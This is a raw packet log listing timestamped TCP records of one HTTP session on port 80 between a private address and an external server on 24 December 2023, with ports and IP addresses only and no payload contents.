Dec 24, 2023 10:44:28.516392946 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.516413927 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.516474009 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.516515017 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.516525030 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.516571045 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.516585112 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.516608953 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.516663074 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.516702890 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.516729116 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.516753912 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.516803980 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.516813993 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.516870975 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.516931057 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.516978979 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.517033100 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.517071009 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.517088890 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.517122984 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.517158031 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.517209053 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.517230034 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.517271042 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.517290115 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.517429113 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.517467022 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.517550945 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.517627001 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.517662048 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.517678976 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.517739058 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.517772913 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.517791033 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.517833948 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.517872095 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.517940998 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.517988920 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.518026114 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.518043995 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.518088102 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.518136978 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.518153906 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.518179893 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.518218040 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.518234015 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.518398046 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.518423080 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.518433094 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.518485069 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.518543959 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.518562078 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.518582106 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.518615961 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.518769026 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.518784046 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.518798113 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.518810987 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.518822908 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.518843889 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.518853903 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.519053936 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.519093037 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.519109964 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.519135952 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.519165039 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.519179106 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.519207001 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.519243002 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.519299984 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.519339085 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.519411087 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.519448996 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.519468069 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.519507885 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.519526005 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.519553900 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.519562960 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.519598961 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.519613981 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.519654036 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.519673109 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.519716024 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.519733906 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.519768000 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.519787073 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.519826889 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.519855976 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.519895077 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.520066023 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.520081043 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.520106077 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.520121098 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.520148993 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.520189047 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.520205975 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.520255089 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.520303011 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.520337105 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.537100077 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.537189007 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.611942053 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.611995935 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.612258911 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.612299919 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.612411976 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.612454891 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.728497982 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.728548050 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.728636980 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.728673935 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.728698969 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.728745937 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.728760958 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.728800058 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.728936911 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.728976965 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.728993893 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.729031086 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.729059935 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.729101896 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.729310989 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.729348898 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.729403019 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.729448080 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.729461908 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.729487896 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.729497910 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.729531050 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.729588985 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.729641914 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.729660034 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.729686022 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.729696035 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.729722023 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.729734898 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.729804039 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.729834080 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.729876995 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.729904890 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.729931116 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.729939938 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.729964018 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.729990959 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.730030060 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.730056047 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.730098963 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.730113983 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.730149031 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.730159998 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.730199099 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.730217934 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.730256081 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.730277061 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.730313063 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.730393887 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.730442047 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.730460882 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.730499983 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.730518103 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.730530977 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.730552912 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.730582952 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.730600119 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.730634928 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.730654001 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.730690956 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.730742931 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.730778933 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.730797052 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.730837107 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.730850935 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.730890036 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.730906963 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.730941057 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.730958939 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.730999947 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.731017113 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.731060028 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.731076002 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.731113911 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.731138945 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.731183052 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.731199026 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.731251955 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.731271029 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.731312037 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.731329918 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.731368065 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.731386900 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.731427908 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.731445074 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.731476068 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.731484890 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.731533051 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.731549025 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.731597900 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.731611013 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.731652021 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.731834888 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.731875896 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.731904984 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.731919050 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.731945038 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.731959105 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.732108116 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.732145071 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.732202053 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.732237101 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.732254982 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.732291937 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.732386112 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.732426882 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.732445955 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.732479095 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.732495070 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.732543945 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.732558012 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.732590914 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.732599974 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.732631922 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.732650042 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.732664108 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.732695103 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.732705116 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.732739925 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.732785940 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.732803106 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.732827902 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.732836962 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.732877016 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.732892990 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.732933044 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.732949972 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.732964039 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.732986927 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.732999086 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.733036041 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.733076096 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.733108044 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.733155012 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.733169079 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.733205080 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.733277082 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.733324051 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.733336926 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.733376026 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.733392954 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.733407021 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.733427048 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.733444929 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.733455896 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.733499050 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.733517885 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.733562946 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.733578920 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.733620882 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.733639002 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.733655930 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.733683109 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.733694077 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.733710051 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.733721972 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.733745098 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.733767986 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.733814955 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.733853102 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.734023094 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.734060049 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.734080076 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.734122038 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.734138012 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.734164953 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.734203100 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.734225035 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.734239101 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.734278917 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.734299898 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.734340906 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.734411955 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.734451056 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.734467983 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.734503031 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.734512091 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.734539986 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.734549999 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.734574080 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.734623909 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.734663963 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.734680891 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.734705925 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.734733105 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.734746933 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.734775066 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.734814882 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.734843016 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.734882116 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.734899998 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.734937906 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.734955072 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.734992981 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.735044003 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.735080004 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.735100031 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.735132933 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.735236883 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.735272884 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.735316992 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.735356092 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.735372066 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.735409975 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.736269951 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.736311913 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.736331940 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.736371994 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.736388922 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.736443043 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.736588955 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.736624956 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.736653090 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.736711979 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.736731052 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.736753941 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.736783981 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.736798048 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.736869097 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.736910105 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.736922026 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.736955881 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.736975908 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.737019062 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.737035036 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.737049103 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.737071037 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.737083912 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.737113953 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.737154007 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.737171888 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.737211943 CET	49716	80	192.168.2.5	91.215.85.17
